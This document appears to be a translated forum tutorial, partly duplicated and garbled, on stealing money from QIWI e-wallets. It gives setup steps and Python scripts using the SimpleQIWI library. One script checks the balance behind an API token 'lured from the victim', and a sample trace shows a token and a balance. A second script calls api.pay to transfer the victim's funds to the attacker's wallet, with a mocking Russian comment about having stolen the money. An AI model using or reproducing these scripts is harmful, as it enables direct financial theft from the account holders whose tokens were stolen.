- 897
- 45
- 1,045
We need Python 3.6 (if not, then install).
Go to the folder with python, then to the folder Scripts and create a bat file with the code:
Your download will begin.
After the component is installed, create the Balance_Check.py file.
Write the code there:
To check the balance, open the Balance_Check.py file.
Where it says Enter Token - insert the token that was lured from the victim.
Next, press Enter. Enter Phone will be written. It is not necessary to write it. (We can just press Enter)
If we did everything correctly, we will see a trace. text:
Further. I'll tell you how to withdraw the whole thing.
Create another bat file call Vivod Babla.py
Open it with a text document and paste the code:
Close the textbook.
Open the file Vivod Babla using Python insert the key and the money is automatically sent to your wallet.
Go to the folder with python, then to the folder Scripts and create a bat file with the code:
pip install SimpleQIWI
Your download will begin.
After the component is installed, create the Balance_Check.py file.
Write the code there:
from SimpleQIWI import *
Everything, we made ourselves a checker for checking balances!Code:
print('Q I W I Software 1.0 / coded by m1wka!');
token=input('Enter token: ')
phone=input('Enter phone: ');
api = QApi(token=token, phone=phone)
print('Balance Founded')
To check the balance, open the Balance_Check.py file.
Where it says Enter Token - insert the token that was lured from the victim.
Next, press Enter. Enter Phone will be written. It is not necessary to write it. (We can just press Enter)
If we did everything correctly, we will see a trace. text:
Here it is. This is our balance.qiwi Software 1.0 / coded by m1wka!
Enter token: c0563229e1e79063a0edc2c4d70808f
Enter phone: 3
Balance Founded
[0.0, 2497.12]
Further. I'll tell you how to withdraw the whole thing.
Create another bat file call Vivod Babla.py
Open it with a text document and paste the code:
from SimpleQIWI import *
print('Q I W I Software 1.0 / coded by m1wka!');
token=input('Enter token: ')
phone=input('Enter phone: ');
api = QApi(token=token, phone=phone)
print('Balance Founded')
api.pay(account="ваш номер киви", amount=сумма, comment='сорри бро, что спиздил твои бабки')
Close the textbook.
Open the file Vivod Babla using Python insert the key and the money is automatically sent to your wallet.